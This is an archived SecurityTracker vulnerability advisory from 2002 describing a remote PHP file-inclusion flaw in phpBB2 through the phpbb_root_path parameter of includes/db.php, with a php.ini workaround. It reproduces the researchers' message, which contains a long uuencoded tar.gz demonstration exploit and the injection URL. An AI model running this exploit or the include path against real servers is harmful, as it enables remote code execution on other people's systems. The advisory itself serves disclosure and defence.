SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   phpBB Vendors:   phpBB Group
phpBB Relative Include Path Bug Lets Remote Users Execute Arbitrary PHP on the Server
SecurityTracker Alert ID:  1003843
SecurityTracker URL:  http://securitytracker.com/id/1003843
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  May 24 2002
Original Entry Date:  Mar 18 2002
Impact:   Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 2.0 RC1, RC2, and RC3
Description:   A vulnerability was reported in the phpBB forum software. A remote user can cause the server to execute arbitrary PHP code.

It is reported that a remote user can specify a relative include path to include a PHP file located on a remote server. This allows the remote user to cause the server to execute arbitrary code hosted on the remote server.

The vulnerability is apparently in the "phpBB2 root path":

'/phpBB2/includes/db.php?phpbb_root_path='

A demonstration exploit is provided in the Source Message.exploitcode

Impact:   A remote user can execute arbitrary PHP code on the phpBB server.
Solution:   No solution was available at the time of this entry.

The author of the report has provided the following workaround:

In php.ini, dissallow remote URLs :

allow_url_fopen = Off

Vendor URL:  phpbb.sourceforge.net/phpBB2/ (Links to External Site)
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Fix is Available) Re: phpBB Relative Include Path Bug Lets Remote Users Execute Arbitrary PHP on the Server
A fix is available.



 Source Message Contents

Subject:  phpBB2 is vulnerable to remote execution command


18th Mar 2002

COMMAND

phpBB2 is vulnerable to remote execution command

SYSTEMS AFFECTED

version 2.0

PROBLEM

pokley and  nullbyte [http://www.inetd-secure.net] found following :

Bug could be found  at  "phpBB2  root  path"  which  is  allowed  remote
attacker to execute any command  remotely.  The  vulnerability  of  this
attack start with  '/phpBB2/includes/db.php?phpbb_root_path='  but  some
backdoor server are needed to launch  the  attack.     I  did  not  look
further into this bug. It is tested on most *nix systems running  phpBB2
version  2.0. Probably all versions.

 Exploit
 =======


begin 600 phpBB2.tar.gz
M'XL(``>;E3P``^Q:>4`3U]8/@F!B?4JKUMW+&$W"DH55E@0A!$%DD444T722
M#"22S(29"1%;7&I;JG6I55QHK?6Y4G'!?>VF=:E+%?=]HRZUMK6"5?O4[\YD
M(4%<VK[V_?'UJIF9.^>>>\ZYY_[.N6<TZ\WQ\<$2SE_90*@T(BP,<`"0183)
MF"ML4OO5_@`B0D/#0F2A$>'!D$P6'!S"`6%_J53V9J%HE`2`@UN,1DTIC3V-
MSJK',./?(=#?V\RV]<]4Q26DJOZB.612:7AHZ%/77R:3A3O6/RPX(@+V!`=+
M91P@_8OD<6O_S]>?9UMY+K>4L("1T!C`A&',#\_F&6)XX=)Z`P7@7UJ/`1-J
MP`$VRFPD##0H,!@Q'H^7$@AH`KXIP@!+2M&6@@)@)<BB0,#PQ3%,!S2HMDA'
M$"2@"!,&K4EB@+#0E$&'`:N!U@,X$0@*PG!48\2"*$);!,70$GB!H=!"PN$$
M#@RTF,?R9W@:#487EGK"8H138`P9?$L"*Z8A"8(&.@.):6F"+!6#;#V*-XH#
M!=:2&$IC`-%I!()&0D9+$A/SE+:W**LDT*)&(S"54L5&,3V*%H-,S(29-!@)
MAJ;G`&5<6C;(R5*!].PD529(3!ZH`FEQJ2I@P8T81=DD<@H+%<"A9(QY#'BA
MF,?+9G1R\F:4IJ&1:9LMC08<`U%!/%Y,+,"T>@(@,6824R#1@"JE:,PDY&M-
M.E$TB%7P>"BN8^<20-OJ"!QC>"<E9P'5D(R!Z<G9(#<]C?G)3`'I:2`W.2TA
M/9=G9%<;%.&$%1@*6/MH41R.9.[87BN<E'E`(=?H(!&/%T0944K/<^R8?CJ4
M+**TJ!GC_:^]^9_V>YL=_^%%HV$W^U\PQ[/Q7Q82'M&(_R&A3/P/"0X)_P?_
M_XX6$PO7G.?(P_CQ.?UE0`X0B=TO#+C6:-%AE$2G89PCEO43-8.L:C-*Z^5Z
MFC9'221(M!N+8)9%'YW&1,E97.L#QZE&R2&Z]8%H)7<EAS!MI2".RD$A1F-X
MB1!)RL[.4$,TS53']5>E92,B%VJ#V84P4Y6:GJU2QR4D9#)$#`+&Z&F340$O
M&*J#%]I`&S&%4"L".;@.(PM)P@(A,@'%3#!.0("WQDAL)+P8B7V(AM"5`DVA
MEC`2I!SI%<XV!+[0&4H`:C04XG)$B^$T1B(*$%,`L1H4H%I,C@S&2!V*H\Y>
MRC`:]@;)8`>4W]W.+)`+';K;9(<T$F:@HO&J(=EN^\5@*@04J94CE-F@*Q6/
M-!<B,'+JX"H@P7U#$*#'#(5Z6HZ$AB*-8YL3D!H(X1M:P=4H=OHG,=W!R"D;
MM`.TAILZ,&X(_3"3F2X5\IFPIH;!5"0"KSL)FB/4$B83#%A/I8-!N%`H?%L
M6)3&B.)%4<.'^VMU+D\!PF$CHH<'B/B"0.!@!N_@**I9GJZ\6:IALN'#I,.!
M7`X$$L&S1O!QS,JH!%W/,3#ZJ<1E`#-2V#.X-<?5830@9F2!OR\PSS,59'(6
M-3;*0-&4T#&1"/3I`Y,/YK:Q[UEZ.R5UBB=W2OU'!+/@%$8W+OR3+)X<VMA3
MQG-S-S<%G3[GJN$S'5&K=Z=Y4A97I;%1F%:(F*TZ5RQZZD+;>2>D*W-2(7ZI
M,]/3LY\S@3NQRQP,,,3H20:7F)\"@C0!'#7!W6PJ91X0@&II`P$QB=V1-F#A
M9R1EJ+-4`Q-A4HC`Y([6$Q!SS01%(^Q6-BN:A07GK-DH"2$61`&V)\:`FRTP
M&2TU0V(:&T4C=@EHEBPG<R"<`QUEQ/!"!HKZ2A$[](5#3"I!C1;,73CG,$8Z
MVZ1VC`$@WI$C/V_N^#AE2D)Z>J9S+JF;$!%]FYW:,<IE9E>H#D84,09%4_06
MNF?O$*]+(&3;\3!&`@?8;QU**&W^_5P=[/O`106%ZP`;$671F`RT6D/CB)V%
MK<>I'^.;%AISC'4/'4\)`"KVD`5BM(0.4U`T#`)DC(1]"*))U&R&QY+89H37
MZC%MD888Y5#`-K+I&BHM)`GCH^-\TWBPBH(T"CM;]ZS#L1/4E-EHH&EX.I/;
MCI@Z3(A(D$``=:9HE_T:"&0BERUE/Q>A0$]B!?)\Q+D!8AT#Y`@$50L)_8-1
M4]CHA"+8#U,5^UHT)7-`%4.4CR@R8=X3(T$5KOD.&TZ>4,`>6!#$%7Q<=SSB
MRN.I4`*W..1N@/32:)C\@!AX.+3@=#,3BICW`0'-81T?*@3$[)3B9B3E&YJ)
M,G_6HB]HT.;%:6KB1C1TPT6;OVM<-IZ>(*`9881JSOEL]!1FA!UV!W;,C@`"
M5^I1O)#9H?#0+6:@56S;:$*1$QG=O=9I7D9\.%@'=Y0<$&8,?UYHL>J9BH*0
M;_,$$N:=[(A&/L_-7QPQ[GD1G'5.=AJX_&+D18*]?>4),Q-6["`#U]^A3CZ$
M*]:$F$[AV.D)#B/'2&S#%/EX,\OG:#9O=Q?MQ61CQD`<@-[D&O,A`]F+C'YR
M?LB+A&'1%5?@)F$Y2G\/1T=KWG82Z.@9Z!^QE+O$_S6!$#%@-,=*A'9<A?_L
M%Z:ST;0V<[!@"\3(GU?CSR?-;FC+NH[DA3SGQ0SCY,QG/5W!7/ZG*^442/+'
M)?H#B?JS\G!'TQHAUC;%+5=QG`AMPXLF64*ZA8:)1533W"F&29"@DZ$PT!DI
MF,C!O(XY),L1&7,'H9+`C:7,09_%8NZS#I3L2[XM27'U$:Z#D@V*0*8`$MID
MEA"L1&P%-EC11Q8-7XG=M$:T*-V4-!K`A+Q)'UP4+M?N"*P(CNF8DZ:1$CQ5
M%@$(2A2X)O^..XE_HR#^@$W#@)DPX+1+MZ0QS8#Z$J2:S138S,$E5Q':;=48
MK1EIN%PN\\_F@T,)"PR;.K9 ]91J9*SU;^"PP0)0"3N!<8,",\:YN-&`IU
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
M:Z5..6;R/N%KI%AH7U#:S,7$_]>G#0````````````````````````````#^
*XQ\@`:;X`%``````
`
end


SOLUTION

 Workaround
 ==========

In php.ini, dissallow remote URLs :

allow_url_fopen = Off


 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC